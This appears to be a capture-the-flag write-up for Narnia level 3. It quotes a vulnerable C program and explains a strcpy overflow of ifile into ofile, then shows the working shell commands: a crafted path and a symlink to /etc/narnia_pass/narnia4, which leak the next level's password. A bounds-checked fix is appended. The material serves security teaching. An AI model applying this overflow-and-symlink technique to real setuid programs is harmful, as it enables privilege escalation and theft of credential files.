Narnia: Level 3

We all have to start somewhere

Posted on May 10, 2017, 6:51 p.m.

Level 3 requires significantly less knowledge of the x86 stack than the previous level.

#include <stdio.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char **argv){

        int  ifd,  ofd;
        char ofile[16] = "/dev/null";
        char ifile[32];
        char buf[32];

        if(argc != 2){
                printf("usage, %s file, will send contents of file 2 /dev/null\n",argv[0]);
                exit(-1);
        }

        /* open files */
        strcpy(ifile, argv[1]);
        if((ofd = open(ofile,O_RDWR)) < 0 ){
                printf("error opening %s\n", ofile);
                exit(-1);
        }
        if((ifd = open(ifile, O_RDONLY)) < 0 ){
                printf("error opening %s\n", ifile);
                exit(-1);
        }

        /* copy from file1 to file2 */
        read(ifd, buf, sizeof(buf)-1);
        write(ofd,buf, sizeof(buf)-1);
        printf("copied contents of %s to a safer place... (%s)\n",ifile,ofile);

        /* close 'em */
        close(ifd);
        close(ofd);

        exit(1);
}

The vulnerability here is that argv[1] is copied into ifile with strcpy, which performs no length check. Since ifile is defined just after ofile in the source code, ifile will appear just before ofile on the stack. Hence, the plan is to overflow ifile into ofile so that both ifile and ofile name files that we control: the first 32 bytes of the argument fill ifile, and whatever follows them lands in ofile. We will also create a symbolic link from ifile to /etc/narnia_pass/narnia4 so that the password is written out to ofile.

narnia3@melinda:~$ mkdir -p /tmp/laddison/aaaaaaaaaaaaaaaaaa/tmp/laddison
narnia3@melinda:~$ touch /tmp/laddison/a
narnia3@melinda:~$ ln -s /etc/narnia_pass/narnia4 /tmp/laddison/aaaaaaaaaaaaaaaaaa/tmp/laddison/a
narnia3@melinda:~$ /narnia/narnia3 /tmp/laddison/aaaaaaaaaaaaaaaaaa/tmp/laddison/a
copied contents of /tmp/laddison/aaaaaaaaaaaaaaaaaa/tmp/laddison/a to a safer place... (/tmp/laddison/a)
narnia3@melinda:~$ cat /tmp/laddison/a
thaenohtai
?~???4???????}0,narnia3@melinda:~$
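
For comparison, a bounds-checked version of the copy that caused the overflow. This is an added example, not code from the original post or from the wargame; struct paths, copy_path and load_input_path are hypothetical names, and the struct only models the adjacent ifile/ofile layout described above.

```c
#include <stdio.h>
#include <string.h>

/* Assumed model of the layout the post describes: ifile sits directly
 * below ofile, so bytes written past ifile[31] would land in ofile. */
struct paths {
    char ifile[32];
    char ofile[16];
};

/* Bounded replacement for strcpy(ifile, argv[1]) (hypothetical helper).
 * Rejects input that does not fit, NUL included, instead of truncating:
 * a silently shortened path would name a different file. */
int copy_path(char *dst, size_t dstsz, const char *src)
{
    size_t n = 0;
    while (n < dstsz && src[n] != '\0')
        n++;
    if (n >= dstsz)
        return -1;              /* no room for the terminator */
    memcpy(dst, src, n + 1);
    return 0;
}

/* Returns 0 if arg was accepted as the input path, -1 if rejected.
 * Either way ofile is still "/dev/null" afterwards. */
int load_input_path(struct paths *p, const char *arg)
{
    memset(p, 0, sizeof *p);
    strcpy(p->ofile, "/dev/null");   /* 10 bytes, fits in ofile[16] */
    return copy_path(p->ifile, sizeof p->ifile, arg);
}

int main(void)
{
    struct paths p;
    const char *args[] = {           /* constructed sample arguments */
        "/etc/hostname",
        "/tmp/laddison/aaaaaaaaaaaaaaaaaa/tmp/laddison/a"
    };
    for (size_t i = 0; i < sizeof args / sizeof args[0]; i++) {
        int rc = load_input_path(&p, args[i]);
        printf("%s -> %s, ofile=%s\n", args[i],
               rc == 0 ? "accepted" : "rejected", p.ofile);
    }
    return 0;
}
```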
